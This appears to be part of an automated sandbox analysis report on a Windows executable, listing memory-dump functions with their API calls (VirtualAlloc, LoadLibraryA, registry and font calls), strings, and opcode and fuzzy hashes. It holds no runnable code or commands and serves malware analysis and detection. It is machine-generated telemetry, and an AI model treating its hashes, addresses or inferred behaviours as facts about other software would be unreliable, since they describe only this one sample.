Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressAuditFreeHandleInetLibraryLoadModuleOfflineProc String ID: DllRegisterServer$Msi$ScanString$mssip32$rrrrrrrtutFrk API String ID: 1378522473-1273433984 Opcode ID: 1a1d8f9adc02558ed4163bbe0ea72374faa3b49d1cfe5cb0d8b7d1e1aed7a199 Instruction ID: bf328fdb3b7fff0191df84ddc3a21c00582c8a3fcbdfa349bb387af89ecb309a Opcode Fuzzy Hash: 1a1d8f9adc02558ed4163bbe0ea72374faa3b49d1cfe5cb0d8b7d1e1aed7a199 Instruction Fuzzy Hash: 1951B0743002058BD700EBA5D942A6A73A5EB85309F51C07BE900AB7E2EB7CED05CB5F

Uniqueness

Uniqueness Score: -1.00%

APIs

GetKeyboardLayout.USER32 ref: 0045441D GetDC.USER32(00000000), ref: 00454472 GetDeviceCaps.GDI32(00000000,0000005A), ref: 0045447C ReleaseDC.USER32 ref: 00454487

Strings

,cF , xrefs: 0045449A $BB , xrefs: 004544A5, 004544B7, 004544C9

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsDeviceKeyboardLayoutRelease String ID: $BB$,cF API String ID: 3331096196-156580243 Opcode ID: 02c75ae8c1627ca64d2ff0d71c190112e98667be6a53cd907d2e82956fb5bcf6 Instruction ID: 0b584d1e58491fa1ea5d4c96f00a0c4a7644df09fe4235dac3e087649deaa05e Opcode Fuzzy Hash: 02c75ae8c1627ca64d2ff0d71c190112e98667be6a53cd907d2e82956fb5bcf6 Instruction Fuzzy Hash: 9C31D7716042419FD740EF69D8C5B487BE4FB05319F4580BAF818DF3A3EB79A8489B19

Uniqueness

Uniqueness Score: -1.00%

APIs

SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 00454C19 CreateFontIndirectA.GDI32(?), ref: 00454C26 GetStockObject.GDI32(0000000D), ref: 00454C3C Part of subcall function 00425C2C: MulDiv.KERNEL32(00000000,?,00000048), ref: 00425C39 SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 00454C65 CreateFontIndirectA.GDI32(?), ref: 00454C75 CreateFontIndirectA.GDI32(?), ref: 00454C8E GetStockObject.GDI32(0000000D), ref: 00454CB4

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFontIndirect$InfoObjectParametersStockSystem String ID: API String ID: 2891467149-0 Opcode ID: 3707ccf87d63a4fde2d24c5a51ee6470f37ba181e11017e0d22171a681295a96 Instruction ID: 0f587122efedf7d321ac9ee3614aa9c37689806316be6897d166c53c05cdaab1 Opcode Fuzzy Hash: 3707ccf87d63a4fde2d24c5a51ee6470f37ba181e11017e0d22171a681295a96 Instruction Fuzzy Hash: 3131D6307042109BEB10EB65DC42B9937E4AB84309F4140B7FD48DB29BEA789848872D

Uniqueness

Uniqueness Score: -1.00%

APIs

MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0042AD2E Part of subcall function 0042ACC4: GetDC.USER32(00000000), ref: 0042ACCD Part of subcall function 0042ACC4: SelectObject.GDI32(00000000,058A00B4), ref: 0042ACDF Part of subcall function 0042ACC4: GetTextMetricsA.GDI32(00000000), ref: 0042ACEA Part of subcall function 0042ACC4: ReleaseDC.USER32 ref: 0042ACFB

Strings

Tahoma , xrefs: 0042AD50 MS Shell Dlg 2 , xrefs: 0042AD98 SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes , xrefs: 0042AD84

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsObjectReleaseSelectText String ID: MS Shell Dlg 2$SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes$Tahoma API String ID: 2013942131-1011973972 Opcode ID: c8202af20d9748dac184fdcebe63c5273684063c3cf8487cfb81228802ca49f1 Instruction ID: 9d3ea1dbbf15434387875305194268bf5b9a98b32bb9e77b65e1f96db536e4fd Opcode Fuzzy Hash: c8202af20d9748dac184fdcebe63c5273684063c3cf8487cfb81228802ca49f1 Instruction Fuzzy Hash: 2211D370700114AFC710DF65E80195D7BB6EB0A304FD14076F800A7BA1DB7D9E22871A

Uniqueness

Uniqueness Score: -1.00%

APIs

GetClassInfoA.USER32 ref: 00421801 UnregisterClassA.USER32 ref: 0042182A RegisterClassA.USER32 ref: 00421834 SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0042187F

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Class$InfoLongRegisterUnregisterWindow String ID: API String ID: 4025006896-0 Opcode ID: ba9f0a0cd088f042a5653a67c0e6f88016342e97d15f47e505010de3adbd19bf Instruction ID: 027158a3b90695bcfb74c3b3aa95824c4aefdb47031e860d546c877da2bcb83e Opcode Fuzzy Hash: ba9f0a0cd088f042a5653a67c0e6f88016342e97d15f47e505010de3adbd19bf Instruction Fuzzy Hash: 52016171B44105ABCB00FBA9EC81F9A3399E718314F144136F914E73F1EA79A88187AE

Uniqueness

Uniqueness Score: -1.00%

APIs

RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,00423BB6), ref: 00423A88 RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019,?,00000000,00423BB6), ref: 00423AF3 RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00000001,?,00000000,00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019), ref: 00423B58

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Open String ID: API String ID: 71445658-0 Opcode ID: fa64aabc8f2ba27a745f52475356cda600ad999c2f50812f57e3693a88520e87 Instruction ID: 1631747641735d97f0e726df34b4cb7d5d51ea82463f4736274f0810a2e96b2b Opcode Fuzzy Hash: fa64aabc8f2ba27a745f52475356cda600ad999c2f50812f57e3693a88520e87 Instruction Fuzzy Hash: 4E41B170B00218BBDB11DFA5E952B9EB7F9AB44304F5144BBB445B3282CB7DAF059B48

Uniqueness

Uniqueness Score: -1.00%

APIs

LoadLibraryA.KERNEL32(00000000,00000000,0045EC57), ref: 0045EBF9 GetModuleHandleA.KERNEL32(00000000,00000000,00000000,0045EC57), ref: 0045EC01 GetProcAddress.KERNEL32(738C0000,00000000), ref: 0045EC35

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleLibraryLoadModuleProc String ID: API String ID: 310444273-0 Opcode ID: 075936419fbc5cca61900586e8d69370c668ceb23336568181fa16149c6eeaa8 Instruction ID: d4a4c4ef2a58cf9094cbc387d8303d04bade7ed1a93cf8cbbf6f48fd4d8bd229 Opcode Fuzzy Hash: 075936419fbc5cca61900586e8d69370c668ceb23336568181fa16149c6eeaa8 Instruction Fuzzy Hash: 790140B0605244AFEB05EB76ED42A5A7BF8DB49314F12047AF504E32E2E678EE50C618

Uniqueness

Uniqueness Score: -1.00%

APIs

GetThreadLocale.KERNEL32 ref: 0040CFBA GetSystemMetrics.USER32 ref: 0040D00D GetSystemMetrics.USER32 ref: 0040D01C

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsSystem$LocaleThread String ID: API String ID: 2159509485-0 Opcode ID: d31af3ae54a2743ab8082880c82d106a239316ea3c0ded5d8796c9a92dcae73e Instruction ID: 76d1b7ec664e111f503e51dd0c1979d9023841a60a1f3c9667e84ab395d3be29 Opcode Fuzzy Hash: d31af3ae54a2743ab8082880c82d106a239316ea3c0ded5d8796c9a92dcae73e Instruction Fuzzy Hash: F3018860A407518AD3205B6694013637AC8DB02319F08C03FE88DE73C2EB3DD846836A

Uniqueness

Uniqueness Score: -1.00%

APIs

RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 00423CEF

Strings

48B , xrefs: 00423D0D

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: QueryValue String ID: 48B API String ID: 3660427363-1399719961 Opcode ID: 5053dc36f7366c11ef80729d79039a07f790926b80e060c94d0a9636341c036b Instruction ID: a8e3a137c339f5fd24472462273deb51e711ff11fc4394b496541acd54afbdef Opcode Fuzzy Hash: 5053dc36f7366c11ef80729d79039a07f790926b80e060c94d0a9636341c036b Instruction Fuzzy Hash: 45012175B00208BBD700EF99DC81A9AB7BCDB59314F10817AFD14DB281DA759E0487A5

Uniqueness

Uniqueness Score: -1.00%

APIs

RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,MS Shell Dlg 2,?,MS Shell Dlg 2,?,00423C38), ref: 00423C06

Strings

MS Shell Dlg 2 , xrefs: 00423BD5, 00423BD7

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: QueryValue String ID: MS Shell Dlg 2 API String ID: 3660427363-3198668166 Opcode ID: ae18820a77b22da24d61138b18a13f76920247e522b4d3da3e4fdaa58bf8c099 Instruction ID: 41461fa9fb353abdc0202eda5798ac71598ea82e96ed0a8436159ebd475baf22 Opcode Fuzzy Hash: ae18820a77b22da24d61138b18a13f76920247e522b4d3da3e4fdaa58bf8c099 Instruction Fuzzy Hash: 92F030723092046BE704EA6EAD41FABA7DCDBC9355F11803EF948D7281DA24DD088365

Uniqueness

Uniqueness Score: -1.00%

APIs

LoadCursorA.USER32 ref: 004547A1 LoadCursorA.USER32 ref: 004547D0

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CursorLoad String ID: API String ID: 3238433803-0 Opcode ID: b46ed10e13b5891911fbcf58363eb243a181175a176f5a66f7bf3ab0bf39d95a Instruction ID: 5b92fd6cb82509c6b3023340ad8d3fa0ece0f32d952ca65a9c1d4e2f0fe40f81 Opcode Fuzzy Hash: b46ed10e13b5891911fbcf58363eb243a181175a176f5a66f7bf3ab0bf39d95a Instruction Fuzzy Hash: E3F08921B046441A9A20557E5CC0A7A72D4DBC773AF20033BFD39DF3D2D72D6C86415A

Uniqueness

Uniqueness Score: -1.00%

APIs

RegFlushKey.ADVAPI32(00000000,?,004239F4,?,?,00000000,00423BA0,00000000,00000000,00000000,00000000,00000001,?,00000000,00000000,00000000), ref: 00423999 RegCloseKey.ADVAPI32(00000000,?,004239F4,?,?,00000000,00423BA0,00000000,00000000,00000000,00000000,00000001,?,00000000,00000000,00000000), ref: 004239A2

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseFlush String ID: API String ID: 320916635-0 Opcode ID: 956964d0e594b963543663876903ecf3408bc7f3908dee6d6cb4c89ebefcd960 Instruction ID: 607071273b8a8f03ded242f4628478f4e142bd0fa1bf7c60492dcbfc477769d6 Opcode Fuzzy Hash: 956964d0e594b963543663876903ecf3408bc7f3908dee6d6cb4c89ebefcd960 Instruction Fuzzy Hash: 7CD012A17002008BCF50EF7AC5C47177BDC5B06315B44C4B7A809EF247D67CC4508B24

Uniqueness

Uniqueness Score: -1.00%

APIs

CreateWindowExA.USER32 ref: 0040734B

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateWindow String ID: API String ID: 716092398-0 Opcode ID: af7131fd70f04d561484b010640c15216212988d875a779ef6235dcc54e20eb2 Instruction ID: e61e4b7de7878b32b5720a0b5ecd670a84b3b3b45b0905eabb5fb271e5fc7604 Opcode Fuzzy Hash: af7131fd70f04d561484b010640c15216212988d875a779ef6235dcc54e20eb2 Instruction Fuzzy Hash: 52F097B2605118BF9B40DE9DDC81DDF7BECEB4D264B054169FA0CE3201D635ED1087A4

Uniqueness

Uniqueness Score: -1.00%

APIs

CreateWindowExA.USER32 ref: 004073A1

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateWindow String ID: API String ID: 716092398-0 Opcode ID: 624295222e5b5063965c5aa621892c6fe0a9898fd49347bfc06a69575b0ebae6 Instruction ID: 85808ded18d7c00b20e9529308029099665b44857ea87863c4fce7c96cc8d2ed Opcode Fuzzy Hash: 624295222e5b5063965c5aa621892c6fe0a9898fd49347bfc06a69575b0ebae6 Instruction Fuzzy Hash: A4F092B2605118BFDB80DE9EDC81E9B7BECEB4D265B00416AFA0CE7241D535ED1087A4

Uniqueness

Uniqueness Score: -1.00%

APIs

GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00405C3A Part of subcall function 00405E80: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00400000,00461790), ref: 00405E9C Part of subcall function 00405E80: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00400000,00461790), ref: 00405EBA Part of subcall function 00405E80: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00400000,00461790), ref: 00405ED8 Part of subcall function 00405E80: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405EF6 Part of subcall function 00405E80: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,00405F85,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405F3F Part of subcall function 00405E80: RegQueryValueExA.ADVAPI32(?,004060EC,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00405F85,?,80000001), ref: 00405F5D Part of subcall function 00405E80: RegCloseKey.ADVAPI32(?,00405F8C,00000000,?,?,00000000,00405F85,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405F7F

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Open$FileModuleNameQueryValue$Close String ID: API String ID: 2796650324-0 Opcode ID: bc21d5101fc51bdf4626e6ca00cb4df6505cc7613c57e159f19c307d06cb48aa Instruction ID: 1b0a8c2aa0dbabf6a82ae7d2e2fcdd13184de0ac0e476d2ee2bc6056b14444b1 Opcode Fuzzy Hash: bc21d5101fc51bdf4626e6ca00cb4df6505cc7613c57e159f19c307d06cb48aa Instruction Fuzzy Hash: 9BE06D71A007108FDB10EE98C8C5A9333D8EB08754F0005A6ED98EF386D374DD908BD4

Uniqueness

Uniqueness Score: -1.00%

APIs

DefWindowProcA.USER32(?,?,?,?), ref: 00455FDE

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: ProcWindow String ID: API String ID: 181713994-0 Opcode ID: feadc97ff837b75b266de6139b99dc6f72c8cfb3ed8b0667b2d15d3104d4f2d8 Instruction ID: a24cf2be33493bd3f548c5cb2912f0d98b4921db6f5013c36e2596895fdb8764 Opcode Fuzzy Hash: feadc97ff837b75b266de6139b99dc6f72c8cfb3ed8b0667b2d15d3104d4f2d8 Instruction Fuzzy Hash: 5DF0C579205608AFCB40DF9DC588D4AFBE9BB4C760B058195B988CB321C234FD80CF90

Uniqueness

Uniqueness Score: -1.00%

APIs

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 00421742

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual String ID: API String ID: 4275171209-0 Opcode ID: 89e6221551a74eb15f9e48ced21239ad1d285c4e27d512bd12529dafe54f9687 Instruction ID: 827c15edd165ef37d5224862c0752f9a577ccbf913505635d27218b0d4be8635 Opcode Fuzzy Hash: 89e6221551a74eb15f9e48ced21239ad1d285c4e27d512bd12529dafe54f9687 Instruction Fuzzy Hash: EC1148782403159FC710DF19D880B42B7E5EB98790F24C53AE9598B396E3B4E9058BA9

Uniqueness

Uniqueness Score: -1.00%

APIs

VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,00401AFF,?,004020BD), ref: 004016DE

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual String ID: API String ID: 4275171209-0 Opcode ID: 529b24f2eb1d7a78af4946a119c865930d0c7bde26a066f6f9e42cf2a5f2b5b0 Instruction ID: 2b17dd7dffbc5f012c9b03bba10325585f0ff40c38224672d8caf756a086162d Opcode Fuzzy Hash: 529b24f2eb1d7a78af4946a119c865930d0c7bde26a066f6f9e42cf2a5f2b5b0 Instruction Fuzzy Hash: C0F037F0B013405BEB09DFBA9D513026AD2E78934AF14C13AE609EB3A8F7B585018B18

Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: QueryValue String ID: API String ID: 3660427363-0 Opcode ID: a9b19634f1954b913239e6be68c787149ff3f6f187062dd75b092390334f8a8b Instruction ID: 800875276e92c53373ba69fa2dd2ac353315e76bbeeccfc9143574534f47cbb5 Opcode Fuzzy Hash: a9b19634f1954b913239e6be68c787149ff3f6f187062dd75b092390334f8a8b Instruction Fuzzy Hash: D2F0816270811017D211BA6FB88166FA6DA5BC4316B55807FB144E7342CE2DCD46435E

Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 5d559119e5020e645031a439a30c23cfb836abcb13fc1e639a940f1964ff5a00 Instruction ID: 8cca72907b2be0a5c9020cef380b81293a90016e3f244105aa71816899a1e7a0 Opcode Fuzzy Hash: 5d559119e5020e645031a439a30c23cfb836abcb13fc1e639a940f1964ff5a00 Instruction Fuzzy Hash: A1F02BB3604A04AFD311CF99E88191AB7ECE7C9720362407BEA04E7B50E675AC01D658

Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 6282f1fe7ee94d0523715df768aead5105b4988d7118abe513641393baefd16a Instruction ID: cf2625c9162a4a8cc6b82e9747e6bc855c41748d9af99755b7471bb8db069ef7 Opcode Fuzzy Hash: 6282f1fe7ee94d0523715df768aead5105b4988d7118abe513641393baefd16a Instruction Fuzzy Hash: 6EF0A0B06146445AD71637FA681361B7388D787308F52C47BF900B66C3EABE4C5492AF

Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: aa2ab5d04534ce78fd06398472ac87fc8e200d4b6eb1d54961e47d4e7a3c3f50 Instruction ID: 48f25c4fc7afed193c39a16cc91a0304f94a1296cd048c63733264e3b5f0309e Opcode Fuzzy Hash: aa2ab5d04534ce78fd06398472ac87fc8e200d4b6eb1d54961e47d4e7a3c3f50 Instruction Fuzzy Hash: D2D0C932100108AFDB018E94AC018677B69EB48210B148815FD0485221D633E831AA91

Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 69199861d6733e8cfdb95971abb33fd6c2e1878ae5676377f49553d2643ae0b4 Instruction ID: 91d624f7da0d7c4e4874d32eb18baa6d87edd49ebcf2bb7b71a7ea9e29257e8c Opcode Fuzzy Hash: 69199861d6733e8cfdb95971abb33fd6c2e1878ae5676377f49553d2643ae0b4 Instruction Fuzzy Hash: 7CE0ECB04016C1CAC740DF64A844204BAE0B74430AF90527FC408E6275F3F846488B4E

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

APIs

SaveDC.GDI32(?), ref: 00434584 RestoreDC.GDI32(?,?), ref: 004345F8 GetWindowDC.USER32(?,00000000,004347E8), ref: 00434672 SaveDC.GDI32(?), ref: 004346A9 RestoreDC.GDI32(?,?), ref: 00434716 DefWindowProcA.USER32(?,?,?,?,00000000,004347E8), ref: 004347CA

Strings

PSC , xrefs: 00434562, 0043468A

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: RestoreSaveWindow$Proc String ID: PSC API String ID: 1975259465-3988711711 Opcode ID: 2210b87bf067a1b2d173e421975d82a66dea5aa8cba3087decbb8f719ba20d3a Instruction ID: e2bc05db2e98f798f29eef0ec9ad69615c0f825a7202cf89475d9a585c1b255b Opcode Fuzzy Hash: 2210b87bf067a1b2d173e421975d82a66dea5aa8cba3087decbb8f719ba20d3a Instruction Fuzzy Hash: E1E14C74A006059FCB10EFA9C5819AEF3F5EF8D304F619166E801A7361C738ED42CB59

Uniqueness

Uniqueness Score: -1.00%

APIs

FindResourceA.KERNEL32(?,00000000,0000000A), ref: 0041A3D6

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

